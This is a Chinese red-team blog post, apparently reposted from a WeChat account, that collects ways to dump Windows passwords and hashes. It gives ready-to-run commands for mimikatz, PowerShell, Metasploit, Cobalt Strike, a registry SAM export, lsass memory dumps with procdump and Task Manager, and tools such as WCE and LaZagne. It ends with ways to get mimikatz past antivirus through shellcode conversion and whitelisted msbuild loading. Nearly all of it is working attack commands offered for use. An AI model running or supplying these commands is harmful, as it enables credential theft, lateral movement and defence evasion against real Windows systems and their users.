【红队技能】之抓密码总结

  • A+
所属分类:安全文章

0x01 在线抓密码

(1)mimikatz
privilege::debug
token::whoami
token::elevate
lsadump::sam
【红队技能】之抓密码总结
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
【红队技能】之抓密码总结
(2)ps脚本
powershell -exec bypass
Import-Module .Get-PassHashes.PS1
Get-PassHashes
【红队技能】之抓密码总结
(3)msf
run hashdump
hashdump
post/windows/gather/credentials/domain_hashdump(获取域hash)
use mimikatz
wdigest(明文)
【红队技能】之抓密码总结
(4)cs
hashdump
wdigest
logonpasswords(明文)
【红队技能】之抓密码总结
【红队技能】之抓密码总结
【红队技能】之抓密码总结

0x02 离线抓密码

(1)SAM(卷影副本、注册表)
reg save hklmsam sam.hiv
reg save hklmsystem system.hiv
lsadump::sam /sam:sam.hiv /system:system.hivmimikatz
【红队技能】之抓密码总结
【红队技能】之抓密码总结
(2)lsass.exe(注入lsass.exe进程,并从其内存中提取)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::mimidump lsass.dmp" "log" "sekurlsa::logonpasswords"
【红队技能】之抓密码总结
【红队技能】之抓密码总结
(3)手工导出lsass.dmp文件
使用任务管理器导出lsass.dmp文件
【红队技能】之抓密码总结
点击创建转储文件
【红队技能】之抓密码总结

0x03 其他工具

(1)Quarks PwDump
命令:quarksPwDump.exe –dhl -o hash.txt
【红队技能】之抓密码总结
(2)WCE
命令:wce.exe -w(抓取明文)、wce.exe –l(抓取hash)
(3)LaZagne
LaZagne windows
【红队技能】之抓密码总结

0x04 特殊环境

4.1 限制上传文件长度时导出凭据的方法
如果实际的测试环境对上传文件的长度做了限制,这里给出的解决方法:上传.cs文件,借助测试环境默认安装的.Net环境,使用csc.exe进行编译
参考三好学生链接
为了应对不同的测试环境,使用的代码应该支持.Net 3.5以及更高版本
编译代码
C:WindowsMicrosoft.NETFramework64v3.5>csc.exe 1.cs /unsafe
【红队技能】之抓密码总结
导出凭据的命令:
1.exe log "privilege::debug" "sekurlsa::logonPasswords full" exit
【红队技能】之抓密码总结
4.2 限制下载文件长度时导出凭据的方法
在c#文件中加载mimikatz的方法,实现以下功能:
下载地址
1.获得lsass.exe进程的dmp文件并保存到temp目录
2.从dmp文件导出凭据
3.删除dmp文件
很多实际情况环境对下载文件做了大小限制
编译命令
C:WindowsMicrosoft.NETFramework64v3.5>csc.exe downloadmimikatz.cs /unsafe
然后直接执行exe
【红队技能】之抓密码总结

0x05 mimikatz bypass

1.PE to shellcode
下载地址
pe2shc.exe mimikatz.exe mimi.txt
runshc64.exe mimi.txt
【红队技能】之抓密码总结
【红队技能】之抓密码总结
这个方法不太行了
2.c#加载mimikatz
cscript mimikatz.js
【红队技能】之抓密码总结
3.白名单加载mimikatz
使用白名单程序msbuild进行进行加载xml文件
C:WindowsMicrosoft.NETFramework64v4.0.30319msbuild.exe mimikatz.xml
4..net4.0加载mimikatz
C:WindowsMicrosoft.NETFramework64v4.0.30319MSBuild.exe executes-mimikatz.xml
【红队技能】之抓密码总结
原创投稿作者:buffer
未经授权,禁止转载

【往期推荐】

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

【超详细 | Python】CS免杀-Shellcode Loader原理(python)

【超详细 | Python】CS免杀-分离+混淆免杀思路

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞

【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

【奇淫巧技】如何成为一个合格的“FOFA”工程师

记一次HW实战笔记 | 艰难的提权爬坑

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

走过路过的大佬们留个关注再走呗【红队技能】之抓密码总结

往期文章有彩蛋哦【红队技能】之抓密码总结

【红队技能】之抓密码总结


本文始发于微信公众号(渗透Xiao白帽):【红队技能】之抓密码总结

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: